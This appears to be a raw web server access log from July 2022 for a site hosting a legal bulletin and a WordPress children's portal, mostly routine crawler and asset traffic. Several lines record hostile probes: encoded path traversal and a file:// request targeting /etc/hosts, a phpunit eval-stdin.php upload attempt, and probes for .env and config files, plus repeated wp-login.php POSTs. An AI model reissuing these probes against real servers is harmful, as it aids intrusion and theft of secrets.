172.22.2.4 - - [05/Jul/2022:03:15:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
66.249.73.5 - - [05/Jul/2022:03:18:31 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:03:19:23 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:20:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:20:36 -0500] "-" 408 -
201.245.192.253 - - [05/Jul/2022:03:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:03:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
172.22.2.4 - - [05/Jul/2022:03:20:52 -0500] "GET /BLA/boletinlegal/js/jquery.scrollto-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [05/Jul/2022:03:20:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:21:50 -0500] "-" 408 -
201.217.205.197 - - [05/Jul/2022:03:22:08 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:20:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
3.236.221.156 - - [05/Jul/2022:03:23:02 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:25:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:03:25:55 -0500] "-" 408 -
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
3.236.221.156 - - [05/Jul/2022:03:26:33 -0500] "-" 408 -
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.169 - - [05/Jul/2022:03:26:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.169 - - [05/Jul/2022:03:26:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
65.154.226.169 - - [05/Jul/2022:03:26:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 101149
172.22.2.4 - - [05/Jul/2022:03:25:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:26:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60561
161.35.188.242 - - [05/Jul/2022:03:30:02 -0500] "\x16\x03\x01" 400 226
161.35.188.242 - - [05/Jul/2022:03:30:02 -0500] "GET / HTTP/1.1" 200 319
161.35.188.242 - - [05/Jul/2022:03:30:02 -0500] "HELP" 501 953
161.35.188.242 - - [05/Jul/2022:03:30:03 -0500] "GET / HTTP/1.1" 200 319
161.35.188.242 - - [05/Jul/2022:03:30:04 -0500] "PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 938
161.35.188.242 - - [05/Jul/2022:03:30:04 -0500] "CONNECT leakix.net:443 HTTP/1.1" 405 938
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 945
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 945
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /.DS_Store HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /frontend_dev.php/$ HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:05 -0500] "GET /idx_config/ HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:06 -0500] "GET /info.php HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:06 -0500] "GET /hardhat.config.js HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:06 -0500] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:06 -0500] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:06 -0500] "GET /v2/_catalog HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:07 -0500] "GET /telescope/requests HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:07 -0500] "GET /login.action HTTP/1.1" 404 1018
161.35.188.242 - - [05/Jul/2022:03:30:07 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jul/2022:03:30:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:30:36 -0500] "-" 408 -
201.245.192.253 - - [05/Jul/2022:03:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:03:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
3.236.221.156 - - [05/Jul/2022:03:31:43 -0500] "-" 408 -
66.249.65.13 - - [05/Jul/2022:03:31:48 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:03:32:52 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:31:25 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48805
172.22.2.4 - - [05/Jul/2022:03:31:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.148.131.22 - - [05/Jul/2022:03:33:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4877.pdf HTTP/1.1" 200 346172
3.236.221.156 - - [05/Jul/2022:03:34:02 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:32:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54336
3.236.221.156 - - [05/Jul/2022:03:35:09 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:35:35 -0500] "HEAD / HTTP/1.1" 200 -
45.148.10.81 - - [05/Jul/2022:03:39:06 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Jul/2022:03:37:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:39:13 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:38:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59397
216.245.221.92 - - [05/Jul/2022:03:40:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:03:40:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [05/Jul/2022:03:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:03:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
185.196.220.70 - - [05/Jul/2022:03:40:41 -0500] "GET / HTTP/1.1" 200 319
65.154.226.220 - - [05/Jul/2022:03:42:16 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.220 - - [05/Jul/2022:03:42:21 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.220 - - [05/Jul/2022:03:42:21 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.220 - - [05/Jul/2022:03:42:23 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.220 - - [05/Jul/2022:03:42:23 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.220 - - [05/Jul/2022:03:42:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.220 - - [05/Jul/2022:03:42:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.220 - - [05/Jul/2022:03:42:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.220 - - [05/Jul/2022:03:42:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.220 - - [05/Jul/2022:03:42:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.220 - - [05/Jul/2022:03:42:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.220 - - [05/Jul/2022:03:42:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.220 - - [05/Jul/2022:03:42:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.220 - - [05/Jul/2022:03:42:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.220 - - [05/Jul/2022:03:42:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.220 - - [05/Jul/2022:03:42:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.220 - - [05/Jul/2022:03:42:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.220 - - [05/Jul/2022:03:42:28 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
172.22.2.4 - - [05/Jul/2022:03:43:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:45:19 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:45:35 -0500] "HEAD / HTTP/1.1" 200 -
43.153.10.221 - - [05/Jul/2022:03:45:49 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Jul/2022:03:44:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
66.249.65.13 - - [05/Jul/2022:03:46:43 -0500] "-" 408 -
40.77.167.67 - - [05/Jul/2022:03:47:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2F HTTP/1.1" 200 31404
185.119.81.107 - - [05/Jul/2022:03:47:55 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [05/Jul/2022:03:47:56 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [05/Jul/2022:03:50:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:49:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:50:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56491
207.46.13.8 - - [05/Jul/2022:03:51:59 -0500] "GET /bla/resoluciones/resoluciones%202012/0680.pdf HTTP/1.1" 200 1550930
3.236.221.156 - - [05/Jul/2022:03:53:28 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:55:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:55:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:55:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52406
3.236.221.156 - - [05/Jul/2022:04:00:29 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:04:00:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:01:36 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:00:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:02:42 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:01:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
150.158.93.71 - - [05/Jul/2022:04:03:44 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1034
150.158.93.71 - - [05/Jul/2022:04:03:44 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1035
172.22.2.4 - - [05/Jul/2022:04:03:46 -0500] "GET /BLA/boletinlegal/xmlrpc.php HTTP/1.1" 404 1038
207.46.13.39 - - [05/Jul/2022:04:04:54 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jul/2022:04:05:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:06:30 -0500] "-" 408 -
40.77.167.106 - - [05/Jul/2022:04:06:57 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:06:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:08:44 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:07:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.171 - - [05/Jul/2022:04:09:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.171 - - [05/Jul/2022:04:09:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.171 - - [05/Jul/2022:04:09:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
65.154.226.171 - - [05/Jul/2022:04:09:28 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
65.154.226.171 - - [05/Jul/2022:04:09:30 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.171 - - [05/Jul/2022:04:09:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 90577
65.154.226.171 - - [05/Jul/2022:04:09:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.39 - - [05/Jul/2022:04:09:34 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 200 868354
185.119.81.103 - - [05/Jul/2022:04:10:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Jul/2022:04:10:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [05/Jul/2022:04:10:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:12:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
109.237.103.9 - - [05/Jul/2022:04:14:21 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.103.9 - - [05/Jul/2022:04:14:21 -0500] "\x16\x03\x01\x01D\x01" 400 226
207.46.13.39 - - [05/Jul/2022:04:14:26 -0500] "GET /Autoliquidacion/Grupo%20Forestal%20-%20Silvicultura/Formulario%20de%20solicitud%20de%20manejo%20o%20aprovechamiento%20forestal.xlsx HTTP/1.1" 304 -
172.22.2.4 - - [05/Jul/2022:04:13:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
172.22.2.4 - - [05/Jul/2022:04:14:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [05/Jul/2022:04:15:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:15:35 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:18:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jul/2022:04:20:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:04:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:04:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
172.22.2.4 - - [05/Jul/2022:04:19:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
3.236.221.156 - - [05/Jul/2022:04:21:06 -0500] "-" 408 -
65.154.226.220 - - [05/Jul/2022:04:22:35 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.220 - - [05/Jul/2022:04:22:35 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.220 - - [05/Jul/2022:04:22:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.220 - - [05/Jul/2022:04:22:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.220 - - [05/Jul/2022:04:22:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.220 - - [05/Jul/2022:04:22:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.220 - - [05/Jul/2022:04:22:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.220 - - [05/Jul/2022:04:22:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.220 - - [05/Jul/2022:04:22:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.220 - - [05/Jul/2022:04:22:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.220 - - [05/Jul/2022:04:22:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.220 - - [05/Jul/2022:04:22:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.220 - - [05/Jul/2022:04:22:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.220 - - [05/Jul/2022:04:22:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.220 - - [05/Jul/2022:04:22:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
